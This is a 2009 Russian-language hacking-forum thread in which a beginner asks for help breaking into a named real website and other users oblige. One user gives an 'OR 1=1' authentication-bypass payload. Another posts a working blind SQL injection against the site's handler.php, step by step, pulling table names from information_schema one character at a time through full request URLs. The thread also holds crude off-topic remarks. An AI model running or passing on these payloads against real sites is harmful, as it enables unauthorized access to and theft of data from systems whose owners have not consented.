Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)
-   -   Помогите "зеленому" с инъекцией! (https://forum.antichat.xyz/showthread.php?t=132479)

ZnikiR 01.08.2009 13:59

Помогите "зеленому" с инъекцией!
 
есть сайт
http://wblist.ru/t3/
короче как произвести sql инъякцию на нем?
====================================
я накопал
username передается при помощи GET
http://wblist.ru/t3/handler.php?username=(значения вводимое в поле с паролем)
а пароль как ни странно вводиться который приходит в ответном смс!
короче не знаю что дальше делать!
BlackCats написал что он ломал этот сайт, но он уехал и не хочет мне ничего рассказывать!

Так что пипл помогите не знаю что дальше делать!

попугай 01.08.2009 14:03

класнные сиськи

ZnikiR 01.08.2009 14:03

В запросе к серваку он зачем-то передает мой cookies со значением phpsessid для чего интеррсно!

Что-то я запутался!
Выручайте молодняк!

ZnikiR 01.08.2009 14:10

http://wblist.ru/t3/ajax.js
очень интересная функция function handleResponse() ,как подминить результат?
вообще возможно?
если не хотите помогать хотя бы скажите правильно ли я думаю?

ZnikiR 01.08.2009 14:12

Цитата:

Сообщение от Pavlov
Тебе какбы извесно о форуме за пределами болталки?
http://forum.antichat.ru/threadedpost1423315.html#post1423315

да известно, но вдруг админы сочтут ,что я нарушаю правила и забанят? вот и решил в болталке написать.

ZnikiR 01.08.2009 14:15

ну я зелённый,перечитал форум решил попробывать свои силы!

ZnikiR 01.08.2009 14:23

Цитата:

Сообщение от Pavlov
Понятно, молодец тогда.

Ты помочь не можешь?

HakaR 01.08.2009 14:24

А мне кажется что сайт разводка...:) Ни каких секретов нет, а на счёт взлома фермера на ачате много инфы... :)

BlackSun 01.08.2009 14:25

Вместо пароля с SMS введи
a' OR 1=1/*
получишь нужную херню

ZnikiR 01.08.2009 14:29

Слушай BlackSun,а можешь рассшифровать?

Winst0n 01.08.2009 14:32

Цитата:

Сообщение от ZnikiR
ну я зелённый,перечитал форум решил попробывать свои силы!

Цитата:

Сообщение от ZnikiR
Слушай BlackSun,а можешь рассшифровать?

омг

BlackSun 01.08.2009 14:32

%63%61%20%65%30%20%65%61%20%32%30%20%65%32%20%66%6 2%20%32%63%20%32%30%20%65%31%20%65%62%20%66%66%20% 66%32%20%66%63%20%32%63%20%32%30%20%65%37%20%65%30 %20%65%35%20%65%31%20%65%30%20%65%62%20%65%38%20%3 2%63%20%32%30%20%66%35%20%65%65%20%66%32%20%66%63% 20%32%30%20%65%31%20%66%62%20%32%30%20%65%61%20%66 %32%20%65%65%20%32%30%20%65%31%20%65%30%20%66%38%2 0%65%61%20%65%65%20%65%39%20%32%30%20%65%66%20%65% 65%20%65%34%20%66%33%20%65%63%20%65%30%20%65%62

ZnikiR 01.08.2009 14:36

Цитата:

Сообщение от BlackSun
%63%61%20%65%30%20%65%61%20%32%30%20%65%32%20%66%6 2%20%32%63%20%32%30%20%65%31%20%65%62%20%66%66%20% 66%32%20%66%63%20%32%63%20%32%30%20%65%37%20%65%30 %20%65%35%20%65%31%20%65%30%20%65%62%20%65%38%20%3 2%63%20%32%30%20%66%35%20%65%65%20%66%32%20%66%63% 20%32%30%20%65%31%20%66%62%20%32%30%20%65%61%20%66 %32%20%65%65%20%32%30%20%65%31%20%65%30%20%66%38%2 0%65%61%20%65%65%20%65%39%20%32%30%20%65%66%20%65% 65%20%65%34%20%66%33%20%65%63%20%65%30%20%65%62

Я не в теме!
ты расшифровать можешь каким,что значит a' OR 1=1/*
это Javascript?
только по русски

Ponchik 01.08.2009 14:45

/me в ужосе схватился за голову
нет слов...

ZnikiR 01.08.2009 14:46

А почему именно 1=1 а не например другой символ=1?
я проверил если 1=0 то пароль не верный!
а что это за язык тут используется?

Ponchik 01.08.2009 14:48

язык SQL
вбей в поле пароль 'OR 1/* и забанься на форуме, тебеж всё уже сказали

Spyder 01.08.2009 14:51

по твоему 1=0 верное сравнение?)

POS_troi 01.08.2009 14:57

2TC

https://forum.antichat.ru/threadnav43966-1-10.html

и вообще что-то гон тут уже пошол

Ponchik 01.08.2009 15:00

5 версия
http://wblist.ru/t3/handler.php?username=a'+OR+substring(version(),1,1 )=5/*
давайте хекнем? :)

ZnikiR 01.08.2009 15:00

Спачибо пипл!
Админы тему можно закрыть!

Ponchik 01.08.2009 15:08

Код:

http://wblist.ru/t3/handler.php?username=a'+OR+((SELECT%20table_name%20FROM%20information_schema.tables%20LIMIT%2015,1)='VIEWS')/*
знач 16 уже идёт табла чо нам нужна, пойду подбирать...
Да, я неумею юзать проги для слепых скулей :(

Код:

http://wblist.ru/t3/handler.php?username=a'+OR+(SELECT+LENGTH(table_name)+FROM+information_schema.tables+LIMIT+16,1)=5/*
5 символов в имени таблы

Код:

http://wblist.ru/t3/handler.php?username=a'+OR+ASCII(SUBSTRING((SELECT%20table_name%20FROM%20information_schema.tables%20LIMIT%2016,1),1,1))=102/*
f****

Код:

http://wblist.ru/t3/handler.php?username=a'+OR+ASCII(SUBSTRING((SELECT%20table_name%20FROM%20information_schema.tables%20LIMIT%2016,1),2,1))=105/*
fi***

Код:

http://wblist.ru/t3/handler.php?username=a'+OR+ASCII(SUBSTRING((SELECT%20table_name%20FROM%20information_schema.tables%20LIMIT%2016,1),3,1))=111/*
fio**

Код:

http://wblist.ru/t3/handler.php?username=a'+OR+ASCII(SUBSTRING((SELECT%20table_name%20FROM%20information_schema.tables%20LIMIT%2016,1),4,1))=105/*
fioi*

Код:

http://wblist.ru/t3/handler.php?username=a'+OR+ASCII(SUBSTRING((SELECT%20table_name%20FROM%20information_schema.tables%20LIMIT%2016,1),5,1))=113/*
табла fioiq, эмм... :confused:

не, точно fioiq
Код:

http://wblist.ru/t3/handler.php?username=a'+OR+((SELECT%20table_name%20FROM%20information_schema.tables%20LIMIT%2016,1)='fioiq')/*
Ну нафик, с такими таблами... пойду дальше работать :)
==
ТС, ты ещё тут? Как мозг? :D

Strik3r 01.08.2009 16:19

тут были сиськи

Бульба 01.08.2009 16:20

и пиписки

mailbrush 01.08.2009 18:53

Я плакать... Форма отправки коммента :) xD
Код:

                <input class=“input-text” type=“text” value="Имя"/>
                <input class=“input-text” type=“text” value="Отзыв"/>
                <input class=“input-text” type=“text” value="Фото (url)"/>
                <FORM>
                <input TYPE="button" VALUE=" Отправить " ONCLICK="HomeButton()"> <script>
                function HomeButton()
                {
                location.href="http://wblist.ru/t3";
                }
                </script>


Joker-jar 01.08.2009 19:08

о_О и отправляет?

-Unlocked- 01.08.2009 20:48

Я сначала подумал, что Green Member'у нужна помощь в проведении скули :-DD

m0Hze 01.08.2009 20:58

Цитата:

Сообщение от -Unlocked-
Я сначала подумал, что Green Member'у нужна помощь в проведении скули :-DD

Аналагична.Я уже прбежал как главный реподрочер за гrинкой :D

mailbrush 01.08.2009 21:19

http://forum.antichat.ru/showpost.php?p=1424335&postcount=10326

И никаких блиндов не надо...

wblist_ru 02.08.2009 14:42

поигрались?
ТЕПЕРЬ
http://img.liveinternet.ru/images/at...25_1527595.jpg

Yangel 02.08.2009 19:58

вышло обновление


Время: 12:16